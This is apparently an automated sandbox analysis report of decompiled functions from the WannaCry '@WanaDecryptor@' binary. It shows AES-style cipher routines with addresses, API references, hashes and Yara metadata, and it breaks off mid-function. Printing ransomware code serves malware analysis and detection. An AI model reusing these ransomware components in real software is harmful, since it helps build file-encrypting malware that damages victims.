                                                      C-Code - Quality: 33%
                                                      			E0040A9D0(intOrPtr __ecx, signed int _a4, signed char* _a8) {
				void* _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v25;
				void* _v26;
				signed int _v28;
				void* _v29;
				void* _v30;
				void* _v31;
				signed int _v32;
				void* _v33;
				void* _v34;
				void* _v35;
				signed int _v36;
				void* _v37;
				void* _v38;
				void* _v39;
				signed int _v40;
				signed int _t161;
				signed int _t162;
				signed char* _t165;
				signed int _t187;
				signed int _t188;
				intOrPtr _t190;
				signed int _t277;
				signed int _t345;
				signed int _t346;
				signed int _t349;
				signed int _t360;
				signed int _t361;
				signed int _t364;
				intOrPtr _t375;
				intOrPtr _t386;
				void* _t387;
				signed int _t388;

				_t375 = __ecx;
				_v24 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t345 = 0xbadbad ^  *(_t375 + 0x1e8);
				_v28 = 0 << 0x18;
				_v40 = 0xbadbad ^  *(_v24 + 0x1ec);
				_t277 = 0xbadbad ^  *(_v24 + 0x1f0);
				_v32 = 0 << 0x18;
				_t386 = _v24;
				_t161 =  *(_t386 + 0x410);
				_v36 = 0xbadbad ^  *(_t386 + 0x1f4);
				_v16 = _t161;
				if(_t161 > 1) {
					_a4 = _t386 + 0x210;
					_v20 = _t161 - 1;
					do {
						_t349 = _t345 & 0x000000ff;
						_t187 = _a4;
						_t188 = _t187 + 0x20;
						_a4 = _t188;
						_v40 =  *0x004189B0 ^  *0x004181B0 ^  *0x004185B0 ^  *(0x418db0 + (_t277 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_t277 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + (_v36 & 0x000000ff) * 4) ^  *_a4;
						_t345 =  *0x004185B0 ^  *0x004189B0 ^  *0x004181B0 ^  *(0x418db0 + (_v40 & 0x000000ff) * 4) ^  *(_t188 - 0x28);
						_t190 = _v20 - 1;
						_v28 = _t345;
						_v32 = _t277;
						_v36 =  *0x004181B0 ^  *0x004185B0 ^  *0x004189B0 ^  *(0x418db0 + _t349 * 4) ^  *(_t187 + 4);
						_v20 = _t190;
					} while (_t190 != 0);
					_t161 = _v16;
					_t386 = _v24;
				}
				_t162 = _t161 << 5;
				_t360 =  *(_t162 + _t386 + 0x1e8);
				_t387 = _t162 + _t386 + 0x1e8;
				_a4 = _t360;
				_t165 = _a8;
				 *_t165 =  *0x004170B0 ^ _t360 >> 0x00000018;
				_t165[1] =  *0x004170B0 ^ _t360 >> 0x00000010;
				_t165[2] =  *0x004170B0 ^ _t360 >> 0x00000008;
				_t165[3] =  *((_v40 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t361 =  *(_t387 + 4);
				_a4 = _t361;
				_t165[4] =  *0x004170B0 ^ _t361 >> 0x00000018;
				_t165[5] =  *0x004170B0 ^ _t361 >> 0x00000010;
				_t165[6] =  *0x004170B0 ^ _t361 >> 0x00000008;
				_t165[7] =  *((_v32 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t364 =  *(_t387 + 8);
				_a4 = _t364;
				_t165[8] =  *0x004170B0 ^ _t364 >> 0x00000018;
				_t165[9] =  *0x004170B0 ^ _t364 >> 0x00000010;
				_t125 = _t345 + 0x4170b0; // 0xd56a0952
				_t165[0xa] =  *_t125 ^ _t364 >> 0x00000008;
				_t346 = _t345 & 0x000000ff;
				_t165[0xb] =  *((_v36 & 0x000000ff) + 0x4170b0) ^ _a4;
				_t388 =  *(_t387 + 0xc);
				_a4 = _t388;
				_t165[0xc] =  *0x004170B0 ^ _t388 >> 0x00000018;
				_t165[0xd] =  *0x004170B0 ^ _t388 >> 0x00000010;
				_t165[0xe] =  *0x004170B0 ^ _t388 >> 0x00000008;
				_t142 = _t346 + 0x4170b0; // 0xd56a0952
				_t165[0xf] =  *_t142 ^ _a4;
				return _t165;
			}







































                                                      0x0040a9d4
                                                      0x0040a9d6
                                                      0x0040a9df
                                                      0x0040a9ea
                                                      0x0040a9f4
                                                      0x0040a9f9
                                                      0x0040a9fa
                                                      0x0040a9fa
                                                      0x0040aa31
                                                      0x0040aa35
                                                      0x0040aa6f
                                                      0x0040aa93
                                                      0x0040aa97
                                                      0x0040aab5
                                                      0x0040aabf
                                                      0x0040aaca
                                                      0x0040aace
                                                      0x0040aad2
                                                      0x0040aadf
                                                      0x0040aae3
                                                      0x0040aae7
                                                      0x0040ab49
                                                      0x0040ab9b
                                                      0x0040abb9
                                                      0x0040abc3
                                                      0x0040abe9
                                                      0x0040abf4
                                                      0x0040abff
                                                      0x0040ac03
                                                      0x0040ac04
                                                      0x0040ac08
                                                      0x0040ac0c
                                                      0x0040ac10
                                                      0x0040ac10
                                                      0x0040ac1a
                                                      0x0040ac1e
                                                      0x0040ac1e
                                                      0x0040ac22
                                                      0x0040ac25
                                                      0x0040ac2c
                                                      0x0040ac3b
                                                      0x0040ac48
                                                      0x0040ac54
                                                      0x0040ac65
                                                      0x0040ac7d
                                                      0x0040ac92
                                                      0x0040ac95
                                                      0x0040aca0
                                                      0x0040acb1
                                                      0x0040accb
                                                      0x0040ace9
                                                      0x0040acf4
                                                      0x0040acf7
                                                      0x0040ad02
                                                      0x0040ad13
                                                      0x0040ad29
                                                      0x0040ad33
                                                      0x0040ad49
                                                      0x0040ad4c
                                                      0x0040ad5c
                                                      0x0040ad5f
                                                      0x0040ad6a
                                                      0x0040ad7b
                                                      0x0040ad91
                                                      0x0040ada6
                                                      0x0040ada9
                                                      0x0040adb6
                                                      0x0040adbc

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A9EA
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A9FA
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                                      • Instruction ID: 04248197bcb1574b3d90ae1a3c7ae13e194e7d8d0e6a6b40a3143ad68c5bfd1a
                                                      • Opcode Fuzzy Hash: 3b2a473cc84b9c7d4a547ef160aa3472c07a9cc6d6db5064c85298185bfba711
                                                      • Instruction Fuzzy Hash: 0AC18E3260C3D14FD305CF7994A41ABBFE2AF9E300F9E98ADE5D98B312C5609505CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040A610 Relevance: 3.3, APIs: 2, Instructions: 308COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 33%
                                                      			E0040A610(signed int __ecx) {
				signed char* _t157;
				signed int _t259;
				signed int _t260;
				signed int _t276;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t378;
				signed int _t379;
				void* _t380;
				signed int _t381;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t393;

				_t391 = __ecx;
				 *(_t393 + 0x18) = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t393 + 0x1c);
					L004130FC();
				}
				_t276 = 0xbadbad ^  *(_t391 + 8);
				 *(_t393 + 0x18) = 0 << 0x18;
				 *(_t393 + 0x14) = 0xbadbad ^  *(_t391 + 0xc);
				_t259 = 0xbadbad ^  *(_t391 + 0x10);
				 *(_t393 + 0x1c) = 0 << 0x18;
				_t378 =  *(_t391 + 0x410);
				 *(_t393 + 0x10) =  *(_t391 + 0x14) ^ 0xbadbad;
				 *(_t393 + 0x20) = _t378;
				if(_t378 > 1) {
					_t392 = _t391 + 0x30;
					 *(_t393 + 0x38) = _t378 - 1;
					do {
						_t392 = _t392 + 0x20;
						 *(_t393 + 0x14) =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + (_t276 & 0x000000ff) * 4) ^  *(_t392 - 0x24);
						 *(_t393 + 0x10) =  *0x004171B0 ^  *0x004179B0 ^  *0x004175B0 ^  *(0x417db0 + (_t259 & 0x000000ff) * 4) ^  *(_t392 - 0x1c);
						_t259 =  *0x004175B0 ^  *0x004171B0 ^  *0x004179B0 ^  *(0x417db0 + ( *(_t393 + 0x14) & 0x000000ff) * 4) ^  *(_t392 - 0x20);
						_t276 =  *0x004179B0 ^  *0x004175B0 ^  *0x004171B0 ^  *(0x417db0 + ( *(_t393 + 0x10) & 0x000000ff) * 4) ^  *(_t392 - 0x28);
						_t390 =  *(_t393 + 0x38) - 1;
						 *(_t393 + 0x18) = _t276;
						 *(_t393 + 0x1c) = _t259;
						 *(_t393 + 0x38) = _t390;
					} while (_t390 != 0);
					_t378 =  *(_t393 + 0x20);
					_t391 =  *((intOrPtr*)(_t393 + 0x24));
				}
				_t379 = _t378 << 5;
				_t357 =  *(_t391 + 8 + _t379);
				_t380 = _t391 + 8 + _t379;
				_t157 =  *(_t393 + 0x3c);
				 *_t157 =  *0x00416FB0 ^ _t357 >> 0x00000018;
				 *(_t393 + 0x38) = _t357;
				_t157[1] =  *0x00416FB0 ^ _t357 >> 0x00000010;
				_t87 = _t259 + 0x416fb0; // 0x7b777c63
				_t157[2] =  *_t87 ^ _t357 >> 0x00000008;
				_t157[3] =  *(( *(_t393 + 0x10) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t358 =  *(_t380 + 4);
				 *(_t393 + 0x38) = _t358;
				_t157[4] =  *0x00416FB0 ^ _t358 >> 0x00000018;
				_t157[5] =  *0x00416FB0 ^ _t358 >> 0x00000010;
				_t157[6] =  *0x00416FB0 ^ _t358 >> 0x00000008;
				_t157[7] =  *(( *(_t393 + 0x18) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t359 =  *(_t380 + 8);
				 *(_t393 + 0x38) = _t359;
				_t157[8] =  *0x00416FB0 ^ _t359 >> 0x00000018;
				_t157[9] =  *0x00416FB0 ^ _t359 >> 0x00000010;
				_t260 = _t259 & 0x000000ff;
				_t157[0xa] =  *0x00416FB0 ^ _t359 >> 0x00000008;
				_t157[0xb] =  *(( *(_t393 + 0x14) & 0x000000ff) + 0x416fb0) ^  *(_t393 + 0x38);
				_t381 =  *(_t380 + 0xc);
				 *(_t393 + 0x34) = _t381;
				_t157[0xc] =  *0x00416FB0 ^ _t381 >> 0x00000018;
				_t157[0xd] =  *0x00416FB0 ^ _t381 >> 0x00000010;
				_t157[0xe] =  *0x00416FB0 ^ _t381 >> 0x00000008;
				_t134 = _t260 + 0x416fb0; // 0x7b777c63
				_t157[0xf] =  *_t134 ^  *(_t393 + 0x2c);
				return _t157;
			}


















                                                      0x0040a614
                                                      0x0040a616
                                                      0x0040a61f
                                                      0x0040a62a
                                                      0x0040a634
                                                      0x0040a639
                                                      0x0040a63a
                                                      0x0040a63a
                                                      0x0040a66f
                                                      0x0040a67c
                                                      0x0040a6a5
                                                      0x0040a6c0
                                                      0x0040a6c4
                                                      0x0040a6e9
                                                      0x0040a6ef
                                                      0x0040a6f6
                                                      0x0040a6fa
                                                      0x0040a700
                                                      0x0040a704
                                                      0x0040a708
                                                      0x0040a70a
                                                      0x0040a7d5
                                                      0x0040a806
                                                      0x0040a811
                                                      0x0040a818
                                                      0x0040a81a
                                                      0x0040a81b
                                                      0x0040a81f
                                                      0x0040a823
                                                      0x0040a823
                                                      0x0040a82d
                                                      0x0040a831
                                                      0x0040a831
                                                      0x0040a835
                                                      0x0040a83a
                                                      0x0040a842
                                                      0x0040a855
                                                      0x0040a85c
                                                      0x0040a864
                                                      0x0040a872
                                                      0x0040a87c
                                                      0x0040a888
                                                      0x0040a89d
                                                      0x0040a8a0
                                                      0x0040a8ab
                                                      0x0040a8bc
                                                      0x0040a8d2
                                                      0x0040a8ea
                                                      0x0040a8ff
                                                      0x0040a902
                                                      0x0040a90d
                                                      0x0040a91e
                                                      0x0040a934
                                                      0x0040a946
                                                      0x0040a952
                                                      0x0040a968
                                                      0x0040a96b
                                                      0x0040a976
                                                      0x0040a987
                                                      0x0040a99d
                                                      0x0040a9b3
                                                      0x0040a9b6
                                                      0x0040a9c3
                                                      0x0040a9c9

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040A62A
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A63A
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                                      • Instruction ID: 24c55d493b92f0f745426086bc8efec80d3c09ac131e354686a8208b9adac079
                                                      • Opcode Fuzzy Hash: 54df54d15dbdb5da3c1e43968a1bcec609f58f276c7696173b96fc0568058aab
                                                      • Instruction Fuzzy Hash: CFC15B2260C2C24BD705CF7998E04EBFFE3AF9E204B4E95A9D5C99B322C5719409C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B0C0 Relevance: 3.2, APIs: 2, Instructions: 242COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0040B0C0(intOrPtr __ecx) {
				intOrPtr _t137;
				signed int _t141;
				signed int _t142;
				signed int* _t144;
				signed int _t145;
				void* _t173;
				signed int* _t189;
				signed int _t192;
				signed int _t196;
				intOrPtr _t198;
				signed char _t200;
				intOrPtr _t207;
				signed int _t227;
				signed int _t231;
				intOrPtr _t233;
				intOrPtr _t262;
				void* _t266;
				signed int _t268;
				signed int* _t270;
				signed char* _t274;
				signed char* _t275;
				signed char* _t276;
				signed char* _t277;
				intOrPtr _t281;
				signed int _t282;
				intOrPtr _t286;
				void* _t287;

				_t286 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t287 + 0x34);
					L004130FC();
				}
				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
				if(_t137 != 0x10) {
					asm("cdq");
					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
					if(_t196 != 4) {
						_t141 = (0 | _t196 != 0x00000006) + 1;
					} else {
						_t141 = 0;
					}
					_t142 = _t141 << 5;
					_t9 = _t142 + 0x41a1dc; // 0x3
					_t233 =  *_t9;
					_t10 = _t142 + 0x41a1e4; // 0x2
					_t198 =  *_t10;
					_t11 = _t142 + 0x41a1ec; // 0x1
					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
					_t15 = _t286 + 0x454; // 0x4a8
					_t144 = _t15;
					if(_t196 > 0) {
						_t282 =  *(_t287 + 0x44);
						_t17 = _t286 + 0x1e8; // 0x23c
						 *(_t287 + 0x10) = _t17;
						 *(_t287 + 0x18) = _t196;
						do {
							 *_t144 = 0 << 0x18;
							_t268 =  *_t144 | 0 << 0x00000010;
							 *_t144 = _t268;
							 *_t144 = _t268;
							_t270 = _t144;
							_t282 = _t282 + 4;
							_t144 =  &(_t144[1]);
							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
							_t227 =  *(_t287 + 0x18) - 1;
							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
							 *(_t287 + 0x18) = _t227;
						} while (_t227 != 0);
						_t198 =  *((intOrPtr*)(_t287 + 0x14));
					}
					_t145 = 1;
					 *(_t287 + 0x1c) = 1;
					if( *(_t286 + 0x410) > 1) {
						_t28 = _t286 + 0x208; // 0x25c
						 *(_t287 + 0x44) = _t28;
						do {
							if(_t196 > 0) {
								_t281 = _t233;
								 *(_t287 + 0x18) =  *(_t287 + 0x44);
								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
								_t33 = _t286 + 0x434; // 0x488
								_t266 = _t33;
								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
								 *(_t287 + 0x10) = _t196;
								while(1) {
									_t266 = _t266 + 4;
									asm("cdq");
									 *(_t287 + 0x2c) = 0;
									asm("cdq");
									asm("cdq");
									_t189 =  *(_t287 + 0x18);
									 *(_t287 + 0x18) =  &(_t189[1]);
									 *(_t266 - 4) =  *(0x4189b0 +  *(_t287 + 0x2c) * 4) ^  *(0x418db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004185B0 ^  *0x004181B0 ^  *_t189;
									_t281 = _t281 + 1;
									_t192 =  *(_t287 + 0x10) - 1;
									 *(_t287 + 0x10) = _t192;
									if(_t192 == 0) {
										break;
									}
									_t207 =  *((intOrPtr*)(_t287 + 0x24));
								}
								_t233 =  *((intOrPtr*)(_t287 + 0x30));
							}
							_t79 = _t286 + 0x434; // 0x488
							_t80 = _t286 + 0x454; // 0x4a8
							_t173 = memcpy(_t80, _t79, _t196 << 2);
							_t287 = _t287 + 0xc;
							_t145 = _t173 + 1;
							_t198 =  *((intOrPtr*)(_t287 + 0x14));
							 *(_t287 + 0x1c) = _t145;
							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
						} while (_t145 <  *(_t286 + 0x410));
					}
					 *(_t287 + 0x44) = 0;
					if(_t196 > 0) {
						_t274 =  *(_t287 + 0x48);
						_t89 = _t286 + 0x454; // 0x4a8
						 *(_t287 + 0x48) = _t89;
						_t262 = _t198;
						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
						do {
							_t200 =  *(_t286 + 0x1e8 + ( *(_t287 + 0x44) +  *(_t286 + 0x410) * 8) * 4);
							 *_t274 =  *0x004170B0 ^ _t200 >> 0x00000018;
							_t275 =  &(_t274[1]);
							asm("cdq");
							 *_t275 =  *0x004170B0 ^ _t200 >> 0x00000010;
							asm("cdq");
							_t276 =  &(_t275[1]);
							 *_t276 =  *0x004170B0 ^ _t200 >> 0x00000008;
							_t277 =  &(_t276[1]);
							asm("cdq");
							 *_t277 =  *(( *(_t286 + 0x454 + ( *(_t287 + 0x2c) + _t262) % _t196 * 4) & 0x000000ff) + 0x4170b0) ^ _t200;
							_t274 =  &(_t277[1]);
							_t145 =  *(_t287 + 0x44) + 1;
							_t262 = _t262 + 1;
							 *(_t287 + 0x44) = _t145;
							 *(_t287 + 0x48) =  &(( *(_t287 + 0x48))[4]);
						} while (_t145 < _t196);
					}
					return _t145;
				} else {
					return E0040A9D0(_t286,  *(_t287 + 0x44),  *(_t287 + 0x48));
				}
			}






























                                                      0x0040b0c5
                                                      0x0040b0ce
                                                      0x0040b0d9
                                                      0x0040b0e3
                                                      0x0040b0e8
                                                      0x0040b0e9
                                                      0x0040b0e9
                                                      0x0040b0ee
                                                      0x0040b0f7
                                                      0x0040b114
                                                      0x0040b11c
                                                      0x0040b122
                                                      0x0040b130
                                                      0x0040b124
                                                      0x0040b124
                                                      0x0040b124
                                                      0x0040b131
                                                      0x0040b136
                                                      0x0040b136
                                                      0x0040b13c
                                                      0x0040b13c
                                                      0x0040b142
                                                      0x0040b148
                                                      0x0040b14c
                                                      0x0040b150
                                                      0x0040b154
                                                      0x0040b154
                                                      0x0040b15a
                                                      0x0040b15c
                                                      0x0040b160
                                                      0x0040b166
                                                      0x0040b16a
                                                      0x0040b16e
                                                      0x0040b175
                                                      0x0040b181
                                                      0x0040b186
                                                      0x0040b18f
                                                      0x0040b193
                                                      0x0040b19b
                                                      0x0040b19c
                                                      0x0040b1a1
                                                      0x0040b1ae
                                                      0x0040b1af
                                                      0x0040b1b3
                                                      0x0040b1b3
                                                      0x0040b1b9
                                                      0x0040b1b9
                                                      0x0040b1c3
                                                      0x0040b1ca
                                                      0x0040b1ce
                                                      0x0040b1d4
                                                      0x0040b1da
                                                      0x0040b1de
                                                      0x0040b1e0
                                                      0x0040b1ea
                                                      0x0040b1ec
                                                      0x0040b1f8
                                                      0x0040b1fa
                                                      0x0040b1fa
                                                      0x0040b200
                                                      0x0040b204
                                                      0x0040b208
                                                      0x0040b216
                                                      0x0040b218
                                                      0x0040b21b
                                                      0x0040b22c
                                                      0x0040b230
                                                      0x0040b255
                                                      0x0040b278
                                                      0x0040b283
                                                      0x0040b28b
                                                      0x0040b28e
                                                      0x0040b28f
                                                      0x0040b290
                                                      0x0040b294
                                                      0x00000000
                                                      0x00000000
                                                      0x0040b20e
                                                      0x0040b212
                                                      0x0040b29a
                                                      0x0040b29a
                                                      0x0040b2a4
                                                      0x0040b2aa
                                                      0x0040b2b0
                                                      0x0040b2b0
                                                      0x0040b2bc
                                                      0x0040b2c2
                                                      0x0040b2c6
                                                      0x0040b2ca
                                                      0x0040b2ca
                                                      0x0040b1de
                                                      0x0040b2d6
                                                      0x0040b2de
                                                      0x0040b2e4
                                                      0x0040b2e8
                                                      0x0040b2ee
                                                      0x0040b2fa
                                                      0x0040b2fc
                                                      0x0040b300
                                                      0x0040b304
                                                      0x0040b313
                                                      0x0040b332
                                                      0x0040b334
                                                      0x0040b338
                                                      0x0040b351
                                                      0x0040b355
                                                      0x0040b35a
                                                      0x0040b373
                                                      0x0040b375
                                                      0x0040b379
                                                      0x0040b398
                                                      0x0040b39a
                                                      0x0040b39b
                                                      0x0040b39f
                                                      0x0040b3a2
                                                      0x0040b3a6
                                                      0x0040b3a6
                                                      0x0040b304
                                                      0x0040b3b7
                                                      0x0040b0f9
                                                      0x0040b111
                                                      0x0040b111

                                                      APIs
                                                      • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
                                                      • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??0exception@@ExceptionThrow
                                                      • String ID:
                                                      • API String ID: 941485209-0
                                                      • Opcode ID: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                                      • Instruction ID: 635c181c6a855438023d43a1e61ad1cbf7521d36b86b6127b0536a3f97539009
                                                      • Opcode Fuzzy Hash: c6e345f075c5c38347d25a9e792861e5e46be767ff3c74cb7ef541de985aba14
                                                      • Instruction Fuzzy Hash: 5F91AE756083858FC718CF28D8906AABBE2FFC9304F14487EE989D7351D634A945CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040ADC0 Relevance: 3.2, APIs: 2, Instructions: 242COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 58%
                                                      			E0040ADC0(signed int __ecx) {
				intOrPtr _t137;
				signed int _t141;
				signed int _t142;
				signed int* _t144;
				signed int _t145;
				void* _t173;
				signed int* _t189;
				signed int _t192;
				signed int _t196;
				intOrPtr _t198;
				signed char _t200;
				intOrPtr _t207;
				signed int _t227;
				signed int _t231;
				intOrPtr _t233;
				intOrPtr _t262;
				void* _t266;
				signed int _t268;
				signed int* _t270;
				signed char* _t274;
				signed char* _t275;
				signed char* _t276;
				signed char* _t277;
				intOrPtr _t281;
				signed int _t282;
				signed int _t286;
				void* _t287;

				_t286 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push(_t287 + 0x34);
					L004130FC();
				}
				_t137 =  *((intOrPtr*)(_t286 + 0x3cc));
				if(_t137 != 0x10) {
					asm("cdq");
					_t196 = _t137 + (_t231 & 0x00000003) >> 2;
					if(_t196 != 4) {
						_t141 = (0 | _t196 != 0x00000006) + 1;
					} else {
						_t141 = 0;
					}
					_t142 = _t141 << 5;
					_t9 = _t142 + 0x41a1d8; // 0x1
					_t233 =  *_t9;
					_t10 = _t142 + 0x41a1e0; // 0x2
					_t198 =  *_t10;
					_t11 = _t142 + 0x41a1e8; // 0x3
					 *((intOrPtr*)(_t287 + 0x30)) = _t233;
					 *((intOrPtr*)(_t287 + 0x20)) =  *_t11;
					 *((intOrPtr*)(_t287 + 0x14)) = _t198;
					_t15 = _t286 + 0x454; // 0x4a8
					_t144 = _t15;
					if(_t196 > 0) {
						_t282 =  *(_t287 + 0x44);
						_t17 = _t286 + 8; // 0x5c
						 *(_t287 + 0x10) = _t17;
						 *(_t287 + 0x18) = _t196;
						do {
							 *_t144 = 0 << 0x18;
							_t268 =  *_t144 | 0 << 0x00000010;
							 *_t144 = _t268;
							 *_t144 = _t268;
							_t270 = _t144;
							_t282 = _t282 + 4;
							_t144 =  &(_t144[1]);
							 *_t270 =  *_t270 ^  *( *(_t287 + 0x10));
							_t227 =  *(_t287 + 0x18) - 1;
							 *(_t287 + 0x10) =  *(_t287 + 0x10) + 4;
							 *(_t287 + 0x18) = _t227;
						} while (_t227 != 0);
						_t198 =  *((intOrPtr*)(_t287 + 0x14));
					}
					_t145 = 1;
					 *(_t287 + 0x1c) = 1;
					if( *(_t286 + 0x410) > 1) {
						_t28 = _t286 + 0x28; // 0x7c
						 *(_t287 + 0x44) = _t28;
						do {
							if(_t196 > 0) {
								_t281 = _t233;
								 *(_t287 + 0x18) =  *(_t287 + 0x44);
								_t207 =  *((intOrPtr*)(_t287 + 0x20)) - _t233;
								_t33 = _t286 + 0x434; // 0x488
								_t266 = _t33;
								 *((intOrPtr*)(_t287 + 0x28)) = _t198 - _t233;
								 *((intOrPtr*)(_t287 + 0x24)) = _t207;
								 *(_t287 + 0x10) = _t196;
								while(1) {
									_t266 = _t266 + 4;
									asm("cdq");
									 *(_t287 + 0x2c) = 0;
									asm("cdq");
									asm("cdq");
									_t189 =  *(_t287 + 0x18);
									 *(_t287 + 0x18) =  &(_t189[1]);
									 *(_t266 - 4) =  *(0x4179b0 +  *(_t287 + 0x2c) * 4) ^  *(0x417db0 + ( *(_t286 + 0x454 + (_t207 + _t281) % _t196 * 4) & 0x000000ff) * 4) ^  *0x004175B0 ^  *0x004171B0 ^  *_t189;
									_t281 = _t281 + 1;
									_t192 =  *(_t287 + 0x10) - 1;
									 *(_t287 + 0x10) = _t192;
									if(_t192 == 0) {
										break;
									}
									_t207 =  *((intOrPtr*)(_t287 + 0x24));
								}
								_t233 =  *((intOrPtr*)(_t287 + 0x30));
							}
							_t79 = _t286 + 0x434; // 0x488
							_t80 = _t286 + 0x454; // 0x4a8
							_t173 = memcpy(_t80, _t79, _t196 << 2);
							_t287 = _t287 + 0xc;
							_t145 = _t173 + 1;
							_t198 =  *((intOrPtr*)(_t287 + 0x14));
							 *(_t287 + 0x1c) = _t145;
							 *(_t287 + 0x44) =  *(_t287 + 0x44) + 0x20;
						} while (_t145 <  *(_t286 + 0x410));
					}
					 *(_t287 + 0x44) = 0;
					if(_t196 > 0) {
						_t274 =  *(_t287 + 0x48);
						_t89 = _t286 + 0x454; // 0x4a8
						 *(_t287 + 0x48) = _t89;
						_t262 = _t198;
						 *((intOrPtr*)(_t287 + 0x30)) = _t233 - _t198;
						 *(_t287 + 0x2c) =  *((intOrPtr*)(_t287 + 0x20)) - _t198;
						do {
